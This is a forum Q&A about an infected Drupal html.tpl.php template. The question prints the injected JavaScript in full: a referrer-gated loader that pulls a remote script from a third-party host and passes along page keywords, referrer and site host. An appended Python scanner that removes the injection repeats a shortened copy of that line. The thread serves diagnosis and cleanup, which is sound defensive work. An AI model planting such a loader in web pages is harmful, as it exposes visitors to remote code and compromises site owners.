David Smith - 10 months ago
PHP Question

PHP malware inside this apparently clean file?

I have a

file (
) inside a module for
, with the following code:

    <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php print $language->language; ?>" version="XHTML+RDFa 1.0" dir="<?php print $language->dir; ?>"<?php print $rdf_namespaces; ?>>
    <head profile="<?php print $grddl_profile; ?>">
      <?php print $head; ?>
      <title><?php print $head_title; ?></title>
      <?php print $styles; ?>
      <?php print $scripts; ?>

      <!-- Injected line, not part of Drupal's html.tpl.php: gates on document.referrer, then document.write()s a remote script tag pointing at jquery.min.php on a third-party host -->
      <script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://atelier24-gerd-kallhardt.de/js/jquery.min.php?c_utt=K85164&c_utm='+encodeURIComponent('http://atelier24-gerd-kallhardt.de/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>
    </head>
    <body class="<?php print $classes; ?>" <?php print $attributes;?>>
      <div id="skip-link">
        <a href="#main-content" class="element-invisible element-focusable"><?php print t('Skip to main content'); ?></a>
      </div>
      <?php print $page_top; ?>
      <?php print $page; ?>
      <?php print $page_bottom; ?>
    </body>
    </html>

My problem is that some antivirus products flag it as malware.

Please check this VirusTotal report.

Could this flag be because of the inclusion of:


The file
lives on:
(Drupal website).

You can download this file from here.

Then I have some questions:

  • Is this a legitimate file (despite a possible infection)?

  • Was it infected?

  • Is there good and bad (malware) code?

  • How can I remove the bad part? Just by deleting that line of code, with:

  • How could this code have gotten attached there?

Answer Source

That happened to me too. Some malware searches for an HTML opening file in the directory structure, I guess, and found this one first. Luckily, the one that was really used, from my theme, wasn't infected.

Search for that "atelier" text in all your files, or for some other string that came with this malware.

It's not especially bad, just a spammer.

Change all back-end admin and (S)FTP passwords and do backups on a regular basis.

If you are on a shared host... hmm... it may be that some other website was hacked, not yours.
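The answer's advice ("search for that atelier text in all your files") and the question's "can I just delete that line" both come down to the same two steps: find every file carrying the injected script, then remove only the injected <script> element while leaving the legitimate template intact. The script below is an added example, not code from the question, the answer or Drupal. The indicator strings are taken from the injected script shown above; the sites/all/... layout, the file names and the sample files are constructed for the demo, and the injected line is a shortened copy that keeps the same referrer gate and remote loader.

```python
"""Scan a Drupal tree for the injected script from the question and strip it.
Added example (not from the question, the answer or Drupal); IOC strings come
from the injected <script> above, the tree and sample files are constructed."""
import os
import re
import shutil
import tempfile

# Substrings of the injected script; one is enough to flag a line.
IOCS = (
    "atelier24-gerd-kallhardt.de",
    "jquery.min.php",
    "document.referrer.indexOf(location.protocol",
    "c_utt=",
)
# Drupal file types worth scanning; ".infected" backups are deliberately excluded.
SCAN_EXTENSIONS = (".php", ".inc", ".module", ".js", ".html", ".htm")
# One <script> element. The injection's document.write() splits "</script>" into
# "<'+'/script>", so the non-greedy match still ends at the real closing tag.
SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)


def scan_tree(root):
    """Return (relative path, line number, matched IOC) for every hit under root."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if not name.endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    for ioc in IOCS:
                        if ioc in line:
                            rel = os.path.relpath(path, root).replace(os.sep, "/")
                            hits.append((rel, lineno, ioc))
                            break
    return hits


def strip_injection(text):
    """Drop only <script> elements containing an IOC; return (text, removed).
    Clean inline scripts and the <?php print $scripts; ?> placeholder survive."""
    removed = 0

    def drop_if_bad(match):
        nonlocal removed
        if any(ioc in match.group(0) for ioc in IOCS):
            removed += 1
            return ""
        return match.group(0)

    return SCRIPT_RE.sub(drop_if_bad, text), removed


def clean_file(path):
    """Back up path to path + '.infected', rewrite it cleaned; return count removed."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        cleaned, removed = strip_injection(fh.read())
    if removed:
        shutil.copy2(path, path + ".infected")  # keep the evidence for the post-mortem
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(cleaned)
    return removed


# Constructed sample data: a cut-down html.tpl.php <head> and a shortened copy of
# the injected line (same IOCs, same referrer gate, same remote loader).
CLEAN_HEAD = """<head profile="<?php print $grddl_profile; ?>">
  <?php print $head; ?>
  <title><?php print $head_title; ?></title>
  <?php print $styles; ?>
  <?php print $scripts; ?>
</head>
"""
INJECTED_LINE = (
    "<script>var a='';setTimeout(10);"
    "if(document.referrer.indexOf(location.protocol+\"//\"+location.host)!==0){"
    "document.write('<script type=\"text/javascript\" src=\"http://atelier24-gerd-kallhardt.de"
    "/js/jquery.min.php?c_utt=K85164\"><'+'/script>');}</script>\n"
)


def make_sample_tree():
    """Hypothetical Drupal layout: clean theme template, infected module template."""
    root = tempfile.mkdtemp(prefix="drupal-scan-")
    theme = os.path.join(root, "sites", "all", "themes", "mytheme")
    module = os.path.join(root, "sites", "all", "modules", "example")
    for d in (theme, module):
        os.makedirs(d)
    with open(os.path.join(theme, "html.tpl.php"), "w", encoding="utf-8") as fh:
        fh.write(CLEAN_HEAD)
    with open(os.path.join(module, "html.tpl.php"), "w", encoding="utf-8") as fh:
        fh.write(CLEAN_HEAD.replace("</head>\n", INJECTED_LINE + "</head>\n"))
    return root


def demo():
    """Scan, clean every flagged file, re-scan; return (hits, removed, hits_after)."""
    root = make_sample_tree()
    try:
        hits = scan_tree(root)
        removed = sum(clean_file(os.path.join(root, rel)) for rel, _, _ in hits)
        return hits, removed, scan_tree(root)
    finally:
        shutil.rmtree(root)
```

On a real site the first pass is the answer's grep (for example `grep -rn atelier24-gerd-kallhardt.de /path/to/drupal`), and `scan_tree()` is just that with the extra indicators, which matters if the attacker rotates the domain. Removal is done on the <script> element rather than on "any line mentioning script", so the template's own `<?php print $scripts; ?>` placeholder and legitimate inline scripts are left alone, and the original file is kept as a `.infected` copy. Cleaning the file fixes the symptom only; the answer's other advice (rotating admin and (S)FTP credentials, restoring from a known-good backup, and considering other tenants on a shared host) is what addresses how the line got there.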